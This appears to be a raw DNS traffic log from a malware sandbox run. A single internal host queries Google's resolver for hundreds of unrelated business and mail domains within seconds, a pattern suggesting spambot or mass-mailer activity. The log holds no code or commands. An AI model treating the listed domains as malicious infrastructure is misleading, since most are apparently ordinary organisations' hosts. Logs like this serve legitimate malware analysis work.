Mar 22, 2023 05:45:01.708786964 CET	192.168.2.5	8.8.8.8	0xd046	Standard query (0)	cjcagent.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.708787918 CET	192.168.2.5	8.8.8.8	0xfcec	Standard query (0)	gbp-jp.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.708959103 CET	192.168.2.5	8.8.8.8	0x2129	Standard query (0)	michiana.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.724221945 CET	192.168.2.5	8.8.8.8	0xb6ff	Standard query (0)	deckoviny.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.785558939 CET	192.168.2.5	8.8.8.8	0xefc5	Standard query (0)	dwid.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.796241045 CET	192.168.2.5	8.8.8.8	0xbeff	Standard query (0)	t-trust.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.824583054 CET	192.168.2.5	8.8.8.8	0xdd02	Standard query (0)	wolffkran.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.837600946 CET	192.168.2.5	8.8.8.8	0x9ba9	Standard query (0)	top1oil.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.837600946 CET	192.168.2.5	8.8.8.8	0x9d93	Standard query (0)	rast.se	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.837773085 CET	192.168.2.5	8.8.8.8	0x2055	Standard query (0)	acraloc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.837773085 CET	192.168.2.5	8.8.8.8	0x5761	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.837887049 CET	192.168.2.5	8.8.8.8	0x6901	Standard query (0)	envogen.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.837887049 CET	192.168.2.5	8.8.8.8	0x334b	Standard query (0)	pcoyuncu.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.852953911 CET	192.168.2.5	8.8.8.8	0xe598	Standard query (0)	com-edit.fr	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.907939911 CET	192.168.2.5	8.8.8.8	0xf25e	Standard query (0)	ascc.org.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.910389900 CET	192.168.2.5	8.8.8.8	0x32bc	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.932794094 CET	192.168.2.5	8.8.8.8	0xb543	Standard query (0)	techtrans.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.934748888 CET	192.168.2.5	8.8.8.8	0xe5b6	Standard query (0)	amerifor.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:01.935784101 CET	192.168.2.5	8.8.8.8	0xb393	Standard query (0)	ciicsc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.021816015 CET	192.168.2.5	8.8.8.8	0x95b0	Standard query (0)	banvari.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.024385929 CET	192.168.2.5	8.8.8.8	0xb0db	Standard query (0)	rokoron.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.033746004 CET	192.168.2.5	8.8.8.8	0x674b	Standard query (0)	mackusick.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.044964075 CET	192.168.2.5	8.8.8.8	0x81f6	Standard query (0)	chzko.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.076478004 CET	192.168.2.5	8.8.8.8	0xfa1c	Standard query (0)	apcotex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.080806017 CET	192.168.2.5	8.8.8.8	0xc76c	Standard query (0)	haigh-me.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.116287947 CET	192.168.2.5	8.8.8.8	0x86b8	Standard query (0)	anteph.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.117217064 CET	192.168.2.5	8.8.8.8	0xa70c	Standard query (0)	h-et-l.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.126769066 CET	192.168.2.5	8.8.8.8	0x156a	Standard query (0)	redgiga.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.152767897 CET	192.168.2.5	8.8.8.8	0xd261	Standard query (0)	chzko.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.153911114 CET	192.168.2.5	8.8.8.8	0x6bfb	Standard query (0)	samtv.ro	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.166085958 CET	192.168.2.5	8.8.8.8	0xac65	Standard query (0)	jabian.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.218563080 CET	192.168.2.5	8.8.8.8	0x5a01	Standard query (0)	duiops.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.219710112 CET	192.168.2.5	8.8.8.8	0xfb84	Standard query (0)	gbmfg.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.241274118 CET	192.168.2.5	8.8.8.8	0x7058	Standard query (0)	muhr-soehne.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.242283106 CET	192.168.2.5	8.8.8.8	0x3629	Standard query (0)	from30ty.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.256817102 CET	192.168.2.5	8.8.8.8	0xbe46	Standard query (0)	polprime.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.276680946 CET	192.168.2.5	8.8.8.8	0x5b00	Standard query (0)	lpver.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.278215885 CET	192.168.2.5	8.8.8.8	0x964	Standard query (0)	anteph.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.295629978 CET	192.168.2.5	8.8.8.8	0x328d	Standard query (0)	eos-i.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.398519039 CET	192.168.2.5	8.8.8.8	0x5cb	Standard query (0)	ruzee.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.413501024 CET	192.168.2.5	8.8.8.8	0x98b3	Standard query (0)	anteph.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.453131914 CET	192.168.2.5	8.8.8.8	0x372b	Standard query (0)	wahw.com.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.468909979 CET	192.168.2.5	8.8.8.8	0x8a82	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.471663952 CET	192.168.2.5	8.8.8.8	0x3882	Standard query (0)	arowines.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.483839989 CET	192.168.2.5	8.8.8.8	0x3ffc	Standard query (0)	orlyhotel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.488614082 CET	192.168.2.5	8.8.8.8	0xeca	Standard query (0)	polprime.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.489005089 CET	192.168.2.5	8.8.8.8	0x51e5	Standard query (0)	workplus.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.489732981 CET	192.168.2.5	8.8.8.8	0xcfbf	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.495291948 CET	192.168.2.5	8.8.8.8	0x887d	Standard query (0)	www.sclover3.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.505449057 CET	192.168.2.5	8.8.8.8	0xc912	Standard query (0)	ymlp15.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.518136024 CET	192.168.2.5	8.8.8.8	0x46fb	Standard query (0)	e-asset.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.518836975 CET	192.168.2.5	8.8.8.8	0x86d5	Standard query (0)	hbfuels.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.535125971 CET	192.168.2.5	8.8.8.8	0x105d	Standard query (0)	www.yumgiskor.kz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.548207998 CET	192.168.2.5	8.8.8.8	0xc2cd	Standard query (0)	web-york.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.564694881 CET	192.168.2.5	8.8.8.8	0x6785	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.575526953 CET	192.168.2.5	8.8.8.8	0xa6ba	Standard query (0)	cubodown.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.576538086 CET	192.168.2.5	8.8.8.8	0xb1d2	Standard query (0)	ymlp15.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.587011099 CET	192.168.2.5	8.8.8.8	0x271f	Standard query (0)	e-asset.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.644690037 CET	192.168.2.5	8.8.8.8	0x7f1e	Standard query (0)	pro-fa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.646773100 CET	192.168.2.5	8.8.8.8	0x9a2a	Standard query (0)	awal.ws	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.682627916 CET	192.168.2.5	8.8.8.8	0x9f9e	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.691090107 CET	192.168.2.5	8.8.8.8	0x3773	Standard query (0)	polprime.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.760698080 CET	192.168.2.5	8.8.8.8	0xbca1	Standard query (0)	htsmx.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.771677971 CET	192.168.2.5	8.8.8.8	0x13a0	Standard query (0)	hyab.se	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.778915882 CET	192.168.2.5	8.8.8.8	0xc080	Standard query (0)	hchc.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.779194117 CET	192.168.2.5	8.8.8.8	0x6ea7	Standard query (0)	ymlp15.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.812786102 CET	192.168.2.5	8.8.8.8	0x434f	Standard query (0)	biurohera.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.814486027 CET	192.168.2.5	8.8.8.8	0xad01	Standard query (0)	cutchie.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.825002909 CET	192.168.2.5	8.8.8.8	0x3dc5	Standard query (0)	awal.ws	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.902242899 CET	192.168.2.5	8.8.8.8	0x19ba	Standard query (0)	captlfix.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.912482977 CET	192.168.2.5	8.8.8.8	0x676e	Standard query (0)	riwn.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.935307026 CET	192.168.2.5	8.8.8.8	0xa3be	Standard query (0)	e-asset.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:02.992480040 CET	192.168.2.5	8.8.8.8	0x1833	Standard query (0)	assideum.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.084064007 CET	192.168.2.5	8.8.8.8	0xaf91	Standard query (0)	wanoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.106980085 CET	192.168.2.5	8.8.8.8	0x1536	Standard query (0)	listel.co.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.107244015 CET	192.168.2.5	8.8.8.8	0x4139	Standard query (0)	araax.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.109003067 CET	192.168.2.5	8.8.8.8	0x4e1e	Standard query (0)	mkm-gr.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.127949953 CET	192.168.2.5	8.8.8.8	0x394d	Standard query (0)	oh28ya.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.140187025 CET	192.168.2.5	8.8.8.8	0x59ca	Standard query (0)	amic.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.143255949 CET	192.168.2.5	8.8.8.8	0xfa06	Standard query (0)	ramkome.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.207325935 CET	192.168.2.5	8.8.8.8	0x1120	Standard query (0)	ciicsc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.298578024 CET	192.168.2.5	8.8.8.8	0x4e3	Standard query (0)	notis.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.301439047 CET	192.168.2.5	8.8.8.8	0x1eb3	Standard query (0)	ccrsi.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.304420948 CET	192.168.2.5	8.8.8.8	0x41b5	Standard query (0)	smtp.live.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.309775114 CET	192.168.2.5	8.8.8.8	0xc621	Standard query (0)	pccj.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.323467016 CET	192.168.2.5	8.8.8.8	0x10af	Standard query (0)	dzm.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.336810112 CET	192.168.2.5	8.8.8.8	0xc64d	Standard query (0)	floopis.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.340262890 CET	192.168.2.5	8.8.8.8	0x2a35	Standard query (0)	ciicsc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.356410980 CET	192.168.2.5	8.8.8.8	0x8213	Standard query (0)	vvsteknik.dk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.358795881 CET	192.168.2.5	8.8.8.8	0xcc10	Standard query (0)	icd-host.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.388328075 CET	192.168.2.5	8.8.8.8	0x434e	Standard query (0)	ciicsc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.404859066 CET	192.168.2.5	8.8.8.8	0xf7b8	Standard query (0)	stopllc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.405879021 CET	192.168.2.5	8.8.8.8	0x5ede	Standard query (0)	ludomemo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.406084061 CET	192.168.2.5	8.8.8.8	0x5dc2	Standard query (0)	anteph.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.463169098 CET	192.168.2.5	8.8.8.8	0xe6d4	Standard query (0)	indonesiamedia.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.472567081 CET	192.168.2.5	8.8.8.8	0xfb5	Standard query (0)	atb-lit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.492856979 CET	192.168.2.5	8.8.8.8	0x8a82	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.504933119 CET	192.168.2.5	8.8.8.8	0x3ca7	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.511545897 CET	192.168.2.5	8.8.8.8	0x887d	Standard query (0)	www.sclover3.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.530340910 CET	192.168.2.5	8.8.8.8	0xf837	Standard query (0)	cpmteam.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.563585997 CET	192.168.2.5	8.8.8.8	0xeeb3	Standard query (0)	aba.org.eg	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.563585997 CET	192.168.2.5	8.8.8.8	0x29e0	Standard query (0)	www.wnsavoy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.611671925 CET	192.168.2.5	8.8.8.8	0xa8fd	Standard query (0)	usadig.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.640979052 CET	192.168.2.5	8.8.8.8	0xc902	Standard query (0)	bible.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.641765118 CET	192.168.2.5	8.8.8.8	0xd091	Standard query (0)	aluminox.es	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.647058964 CET	192.168.2.5	8.8.8.8	0x1624	Standard query (0)	keio-web.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.647154093 CET	192.168.2.5	8.8.8.8	0x1653	Standard query (0)	any-s.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.648515940 CET	192.168.2.5	8.8.8.8	0x61a	Standard query (0)	peminet.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.654654980 CET	192.168.2.5	8.8.8.8	0xd6e4	Standard query (0)	aluminox.es	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.752383947 CET	192.168.2.5	8.8.8.8	0x3773	Standard query (0)	polprime.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.752796888 CET	192.168.2.5	8.8.8.8	0x9f9e	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.801734924 CET	192.168.2.5	8.8.8.8	0x46cc	Standard query (0)	hazmatt.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.810102940 CET	192.168.2.5	8.8.8.8	0x1019	Standard query (0)	fr-dat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.838471889 CET	192.168.2.5	8.8.8.8	0xe0bd	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.847650051 CET	192.168.2.5	8.8.8.8	0xa53b	Standard query (0)	ikulani.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.865878105 CET	192.168.2.5	8.8.8.8	0x8570	Standard query (0)	refintl.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.922897100 CET	192.168.2.5	8.8.8.8	0xb1cd	Standard query (0)	dspears.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.924372911 CET	192.168.2.5	8.8.8.8	0xaa7c	Standard query (0)	thiessen.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.924372911 CET	192.168.2.5	8.8.8.8	0xcc0a	Standard query (0)	portoccd.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:03.955903053 CET	192.168.2.5	8.8.8.8	0x7a48	Standard query (0)	burstner.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.066231012 CET	192.168.2.5	8.8.8.8	0x2f7f	Standard query (0)	workplus.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.094454050 CET	192.168.2.5	8.8.8.8	0x616b	Standard query (0)	insia.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.148113966 CET	192.168.2.5	8.8.8.8	0x2b39	Standard query (0)	vfcindia.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.156419992 CET	192.168.2.5	8.8.8.8	0xa109	Standard query (0)	shztm.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.245346069 CET	192.168.2.5	8.8.8.8	0x97e5	Standard query (0)	yhsll.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.370523930 CET	192.168.2.5	8.8.8.8	0x2169	Standard query (0)	linac.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.415390968 CET	192.168.2.5	8.8.8.8	0x3542	Standard query (0)	pro-fa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.462968111 CET	192.168.2.5	8.8.8.8	0x30f6	Standard query (0)	noblesse.be	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.482904911 CET	192.168.2.5	8.8.8.8	0x2348	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.531785965 CET	192.168.2.5	8.8.8.8	0xde56	Standard query (0)	t-mould.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.546360970 CET	192.168.2.5	8.8.8.8	0x3ca7	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.579488039 CET	192.168.2.5	8.8.8.8	0x6cb5	Standard query (0)	mkm-gr.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.605745077 CET	192.168.2.5	8.8.8.8	0x5a19	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.815516949 CET	192.168.2.5	8.8.8.8	0xaa2e	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.816116095 CET	192.168.2.5	8.8.8.8	0x146a	Standard query (0)	avc.com.sa	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.821572065 CET	192.168.2.5	8.8.8.8	0xbfe3	Standard query (0)	yhsll.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.905323982 CET	192.168.2.5	8.8.8.8	0xbae	Standard query (0)	nolaoig.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.992345095 CET	192.168.2.5	8.8.8.8	0x4fe0	Standard query (0)	603888.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:04.997854948 CET	192.168.2.5	8.8.8.8	0x458b	Standard query (0)	vdoherty.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.118969917 CET	192.168.2.5	8.8.8.8	0x28d9	Standard query (0)	xsui.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.161750078 CET	192.168.2.5	8.8.8.8	0x597e	Standard query (0)	kewlmail.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.203454971 CET	192.168.2.5	8.8.8.8	0x8a32	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.206234932 CET	192.168.2.5	8.8.8.8	0x4d2a	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.207362890 CET	192.168.2.5	8.8.8.8	0x51ab	Standard query (0)	xinhui.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.208264112 CET	192.168.2.5	8.8.8.8	0xd8a6	Standard query (0)	alexpope.biz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.212847948 CET	192.168.2.5	8.8.8.8	0x76cd	Standard query (0)	siongann.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.223885059 CET	192.168.2.5	8.8.8.8	0xc6a0	Standard query (0)	missnue.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.259938955 CET	192.168.2.5	8.8.8.8	0x2dd5	Standard query (0)	ncn.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.259938955 CET	192.168.2.5	8.8.8.8	0x4422	Standard query (0)	pccj.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.261780977 CET	192.168.2.5	8.8.8.8	0xcd3c	Standard query (0)	holp-ai.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.287729979 CET	192.168.2.5	8.8.8.8	0x5438	Standard query (0)	simetar.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.445487976 CET	192.168.2.5	8.8.8.8	0xaac7	Standard query (0)	univi.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.445487976 CET	192.168.2.5	8.8.8.8	0xe20d	Standard query (0)	oh28ya.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.481296062 CET	192.168.2.5	8.8.8.8	0xee20	Standard query (0)	x96.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.618165016 CET	192.168.2.5	8.8.8.8	0xed74	Standard query (0)	lyto.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.620002985 CET	192.168.2.5	8.8.8.8	0x88cf	Standard query (0)	host.do	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.626549959 CET	192.168.2.5	8.8.8.8	0x5a19	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.629241943 CET	192.168.2.5	8.8.8.8	0xae47	Standard query (0)	keio-web.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.642802954 CET	192.168.2.5	8.8.8.8	0xd192	Standard query (0)	shenhgts.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.719750881 CET	192.168.2.5	8.8.8.8	0xefdc	Standard query (0)	impexnc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.720069885 CET	192.168.2.5	8.8.8.8	0xcabd	Standard query (0)	magicomm.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.722037077 CET	192.168.2.5	8.8.8.8	0x8a43	Standard query (0)	sigtoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.722107887 CET	192.168.2.5	8.8.8.8	0x6a70	Standard query (0)	metaforacom.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.751759052 CET	192.168.2.5	8.8.8.8	0xe9fe	Standard query (0)	www.muhr-soehne.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.764929056 CET	192.168.2.5	8.8.8.8	0xfb42	Standard query (0)	htsmx.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.822477102 CET	192.168.2.5	8.8.8.8	0x1fcc	Standard query (0)	rtcasey.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.862396955 CET	192.168.2.5	8.8.8.8	0x146a	Standard query (0)	avc.com.sa	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.871112108 CET	192.168.2.5	8.8.8.8	0xceb	Standard query (0)	polprime.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.907613993 CET	192.168.2.5	8.8.8.8	0x214d	Standard query (0)	polprime.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.945785046 CET	192.168.2.5	8.8.8.8	0x920b	Standard query (0)	polprime.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.987946033 CET	192.168.2.5	8.8.8.8	0x598d	Standard query (0)	daytonir.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:05.989614964 CET	192.168.2.5	8.8.8.8	0x9eca	Standard query (0)	infotech.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.067935944 CET	192.168.2.5	8.8.8.8	0xc3ae	Standard query (0)	avc.com.sa	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.074434042 CET	192.168.2.5	8.8.8.8	0xeb4d	Standard query (0)	cvswl.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.109952927 CET	192.168.2.5	8.8.8.8	0x6b55	Standard query (0)	ccrsi.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.118041039 CET	192.168.2.5	8.8.8.8	0xc0a	Standard query (0)	mail.airmail.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.138097048 CET	192.168.2.5	8.8.8.8	0xa2bd	Standard query (0)	toundo.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.148278952 CET	192.168.2.5	8.8.8.8	0xc32	Standard query (0)	nts-web.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.167346001 CET	192.168.2.5	8.8.8.8	0x6ce6	Standard query (0)	hchc.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.190045118 CET	192.168.2.5	8.8.8.8	0x89d0	Standard query (0)	orbitgas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.191762924 CET	192.168.2.5	8.8.8.8	0x8cfa	Standard query (0)	ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.200005054 CET	192.168.2.5	8.8.8.8	0x24e7	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.219332933 CET	192.168.2.5	8.8.8.8	0xf474	Standard query (0)	eos-i.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.234261990 CET	192.168.2.5	8.8.8.8	0xffe1	Standard query (0)	dhh.la.gov	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.249718904 CET	192.168.2.5	8.8.8.8	0xfef0	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.258883953 CET	192.168.2.5	8.8.8.8	0xdd7a	Standard query (0)	slower.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.321352005 CET	192.168.2.5	8.8.8.8	0x7c8	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.366981030 CET	192.168.2.5	8.8.8.8	0x53a5	Standard query (0)	pccj.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.373655081 CET	192.168.2.5	8.8.8.8	0xe2d3	Standard query (0)	pellys.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.373874903 CET	192.168.2.5	8.8.8.8	0x9a07	Standard query (0)	cjborden.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.482470036 CET	192.168.2.5	8.8.8.8	0x63c3	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:06.514065981 CET	192.168.2.5	8.8.8.8	0xb927	Standard query (0)	avc.com.sa	A (IP address)	IN (0x0001)	false
